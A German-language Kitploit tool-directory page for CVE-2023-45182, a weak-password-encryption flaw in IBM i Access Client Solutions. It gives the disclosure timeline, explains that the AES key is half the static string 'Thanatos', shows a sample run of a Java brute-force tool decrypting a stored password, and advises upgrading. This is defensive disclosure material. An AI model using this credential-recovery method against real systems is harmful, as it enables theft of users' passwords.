Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-45182 — IBM i Access Client Solutions < 1.1.9.4 - Schwache Passwortverschlüsselung | Kitploit
Tools/GitHubGitHub/afine-com/cve-2023-45182
Passwort-CrackingVerschlüsselungs-/EntschlüsselungstoolsSchwachstellenanalyseExploitationKryptographie
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Schwache Passwortverschlüsselung

Repository anzeigen
3vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Schwache Passwortverschlüsselung

Zeitleiste

  • Schwachstelle an Anbieter gemeldet: 22.09.2023
  • Neue behobene Version 1.1.9.4 veröffentlicht: 08.12.2023
  • Öffentliche Offenlegung: 15.12.2023

Beschreibung

IBM i Access Client Solutions verwendet zum Speichern von Benutzerpasswörtern den AES-Algorithmus, jedoch setzt sich der 16-Byte-Verschlüsselungsschlüssel aus einer statischen Zeichenfolge (Thanatos) und zufälligen Zeichen aus einer Zeichenfolge zusammen, die aus einer weiteren statischen Zeichenfolge (Behemoth) besteht, kombiniert mit Benutzername, Home-Verzeichnis des Benutzers, Betriebssystem (z.B. Linux) kombiniert mit dem aktuellen Verzeichnis, in dem die Anwendung gestartet wurde. Dadurch ist die Hälfte des Verschlüsselungsschlüssels statisch (Zeichenfolge Thanatos), während die zweite Hälfte sehr begrenzt ist. Dies macht es einem Angreifer sehr leicht, selbst auf einem einzelnen CPU-Kern Passwörter zu erraten.

Hier ist ein Beispiel für die Passwortentschlüsselung des Benutzers mmajchrowicz mit dem Skript as400_password_bruteforce_tool.java vom Konto mkubiak:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

Dieses Problem wurde durch die Verwendung einer schwachen Passwortverschlüsselung verursacht. Dieses Problem wurde in IBM i Access Client Solutions 1.1.9.4 behoben.

Betroffene Versionen

< 1.1.9.4

Hinweis

Aktualisieren Sie IBM i Access Client Solutions auf Version 1.1.9.4 oder neuer.

Referenzen

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
Tool herunterladen